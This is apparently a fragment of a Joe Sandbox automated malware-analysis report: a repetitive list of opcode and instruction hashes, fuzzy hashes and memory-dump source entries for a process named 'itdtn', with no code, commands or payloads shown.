                                                • API String ID:
                                                • Opcode ID: 2125fc805585c30ea2da09e516c4e566cbc67713360ccb6cc8e84bc128949e05
                                                • Instruction ID: 77cc1515e0503c9e5427d118269f03fe2efa10b634e3f3e16bce5c15df00df78
                                                • Opcode Fuzzy Hash: 2125fc805585c30ea2da09e516c4e566cbc67713360ccb6cc8e84bc128949e05
                                                • Instruction Fuzzy Hash: 64E01A70D0920C9FCB50EFB8D9456AD7EB5AB48206F9041FA990993354DA705A908B81
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 774cc52dbe0765bd0193b7ff3161fc67e169e5a4fe3d2ecd45f63e54ed68e8df
                                                • Instruction ID: 381cf622c49c6322ea0e84f362b511edfbe4a99d57fc57634f18c9c97e80d149
                                                • Opcode Fuzzy Hash: 774cc52dbe0765bd0193b7ff3161fc67e169e5a4fe3d2ecd45f63e54ed68e8df
                                                • Instruction Fuzzy Hash: F9E0DF74809108AFC700CFA4D5009ACBFBCAB45300F14C0EDD80453345C6319A41DB90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab6b7c75a94fcbb1d9877d480cb272738fa59e7dbedc0ac3788bdd927f4aa68b
                                                • Instruction ID: 55e82bd25b5e03fcf1413a2a5fe401e2db793ae0e8d8fab8454db53b592f9f04
                                                • Opcode Fuzzy Hash: ab6b7c75a94fcbb1d9877d480cb272738fa59e7dbedc0ac3788bdd927f4aa68b
                                                • Instruction Fuzzy Hash: 51E01234D0A208AFCB54EFA8D6416ACFBB9EB88201F10C1EED85857351D6369A42DF80
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9a3edfcb14a689ed2144a5c5876d2c056a3a6b797b313927ec1bf25aed317e6
                                                • Instruction ID: feaf627e8781eec73a4bc06693279b9346c67ec93d7298dcb22fa7265af39619
                                                • Opcode Fuzzy Hash: c9a3edfcb14a689ed2144a5c5876d2c056a3a6b797b313927ec1bf25aed317e6
                                                • Instruction Fuzzy Hash: 75E0EC70D56208DFCB50EFB8D64569DBFF8AB04701F5081EDDC0993350E6705A90CB41
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64677a5c61d8e58f1b21b7b6ea1f8394fa178ce38324cbec765028b195bbb855
                                                • Instruction ID: 82873f5bc28f615109cedadec0c962508a5b931ecd327fde95943cad750a2550
                                                • Opcode Fuzzy Hash: 64677a5c61d8e58f1b21b7b6ea1f8394fa178ce38324cbec765028b195bbb855
                                                • Instruction Fuzzy Hash: C8E08C34D09108DBC704DFA4D6405AEBBB8AB85300F68D1ECC80823381CA329E42CB80
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f1a4cee480e115a8fc78a7c7a0d60a0c51c358c2049495399def68dca4abb1a
                                                • Instruction ID: b7151c6380ade44eccc81a9336c63521dd328ca67b227e8486d13c3f8a585376
                                                • Opcode Fuzzy Hash: 9f1a4cee480e115a8fc78a7c7a0d60a0c51c358c2049495399def68dca4abb1a
                                                • Instruction Fuzzy Hash: D3D02B31304B154BD791D32CB9407563BE59B8C100B048668E445C3305DF20EC4643D8
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2246781220.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5fb0000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2091f181600cac4d9859040f84f3888ebe9f954d7420c1f3c7526f5f1d2df61c
                                                • Instruction ID: 0bf2908cc556914ff01675993e781d6ef3b8c002e7d21319a59f072b687b25fc
                                                • Opcode Fuzzy Hash: 2091f181600cac4d9859040f84f3888ebe9f954d7420c1f3c7526f5f1d2df61c
                                                • Instruction Fuzzy Hash: 13C02B31CDF3068EC26C2AD4670C3B83FDCD70B316F8458B4A00F01029CE645890C224
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0d0df0a84594b65b03d05935d4fbc670534be61227cd89ab55a3474d9dfdb8d
                                                • Instruction ID: 3381e4393643bddc077c9d07fb62cf86e5124858a983287b7261c1be870767f4
                                                • Opcode Fuzzy Hash: f0d0df0a84594b65b03d05935d4fbc670534be61227cd89ab55a3474d9dfdb8d
                                                • Instruction Fuzzy Hash: FAD0A9342003449BC300DB28F801E817F24BB16220F9040C4F99287332C323A410EA50
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06728c3646c7ef1933b277592edd40061a54d94ed509138ef41671ab602cdcb4
                                                • Instruction ID: 4edb6a46c7f921b9798b703344f881569a596b4aba63144767af0c0239011421
                                                • Opcode Fuzzy Hash: 06728c3646c7ef1933b277592edd40061a54d94ed509138ef41671ab602cdcb4
                                                • Instruction Fuzzy Hash: 1BD02234200644DFD340DB39F406E807F64EB16A24FC08084F80587233C332A844CF02
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 113da7e1dea2925eb47426d752f44ceb07621c39f1a0d9f37b2cc39986ef4132
                                                • Instruction ID: 4a0d5d2c33e7be696c4846a331a7a1d7bc6da3f96e8671fe30ae9c1be503a5e2
                                                • Opcode Fuzzy Hash: 113da7e1dea2925eb47426d752f44ceb07621c39f1a0d9f37b2cc39986ef4132
                                                • Instruction Fuzzy Hash: 9EC012791002009FDB054F14D5857197B72D7D1300FD58474A01493B40CA399C51EB25
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d05d19e9ac2921a088eefe70bbf706bf4c1068fc1ed08209c9759521dcf30f2
                                                • Instruction ID: 143e325879d82f0382b52a1339b75cc40f1e84cfe0231ef0b7b637f500e50779
                                                • Opcode Fuzzy Hash: 5d05d19e9ac2921a088eefe70bbf706bf4c1068fc1ed08209c9759521dcf30f2
                                                • Instruction Fuzzy Hash: 76B09B4450A68057E352731824017BA6F85F707111ECCA5D8644B834D599051041D1C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2244982026.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5b00000_itdtn.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94